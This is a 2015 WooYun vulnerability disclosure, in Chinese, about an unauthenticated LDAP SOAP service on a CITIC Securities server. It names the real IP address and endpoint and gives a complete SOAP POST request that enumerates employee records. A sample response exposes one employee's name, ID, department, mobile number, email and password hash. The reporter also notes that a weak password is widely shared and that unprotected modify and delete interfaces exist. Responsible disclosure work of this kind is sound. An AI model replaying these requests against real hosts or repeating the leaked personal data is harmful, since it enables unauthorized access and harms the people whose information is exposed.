当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117920

漏洞标题:看我如何获得中信证劵所有员工敏感信息的

相关厂商:中信证券

漏洞作者: 茜茜公主

提交时间:2015-06-03 11:51

修复时间:2015-07-18 12:54

公开时间:2015-07-18 12:54

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-03: 细节已通知厂商并且等待厂商处理中
2015-06-03: 厂商已经确认,细节仅向厂商公开
2015-06-13: 细节向核心白帽子及相关领域专家公开
2015-06-23: 细节向普通白帽子公开
2015-07-03: 细节向实习白帽子公开
2015-07-18: 细节向公众公开

简要描述:

姓名、工号、密码、电话、邮箱、所在地

详细说明:

中信证券文档云系统
http://1.202.152.33/doccloud/login
访问该地址后会提示

QQ截图20150603105349.jpg


貌似要用vpn才能登录
貌似无缝可钻,但我发现了系统使用了jboss,所以我得到了这个

QQ截图20150603105551.jpg

漏洞证明:

进而发现了这处接口http://1.202.152.33/zxzqwebservice/servlet/XFireServlet/LDAPUserServices?wsdl
利用工具
我们能够把所有中信员工的信息遍历出来

POST http://1.202.152.33/zxzqwebservice/servlet/XFireServlet/LDAPUserServices HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: ""
Host: 1.202.152.33
Content-Length: 415
Expect: 100-continue
Connection: Keep-Alive
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><accountReconciliation xmlns="http://com.iss.saas.server.LDAPUserServices"><dataType>0</dataType><pageSize>1</pageSize><startNum>10000</startNum></accountReconciliation></soap:Body></soap:Envelope>


<?xml version='1.0' encoding='utf-8' ?><result><returnCode>success</returnCode><message>Reconciliation Success.</message><completed>false</completed><accountSet><account><cn>谢希</cn><userpassword>-3110-365773-7089-85-6686-3287-1415-12062</userpassword><ou>风险管理部</ou><uid>002867</uid><departmentnumber>000020</departmentnumber><mobile>13810317833</mobile><telephonenumber>60838802</telephonenumber><mail>xiexi@citics.com</mail><o>1</o></account></accountSet></result>


QQ截图20150603110125.jpg


通过修改startNum,遍历能够得到大概13000多的员工信息,
通过比对password返回值,大部分员工密码是

-3110-365773-7089-85-6686-3287-1415-12062

,可知是个弱口令
下面还有新增、删除和修改的接口,传入相应的xml即可,好想试试

QQ截图20150603110504.jpg


修复方案:

接口调用的时候加个权限判断

版权声明:转载请注明来源 茜茜公主@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-06-03 12:53

厂商回复:

非常感谢,正在积极处置

最新状态:

2015-07-22:该问题在6月上旬已经修复,该服务已经下线。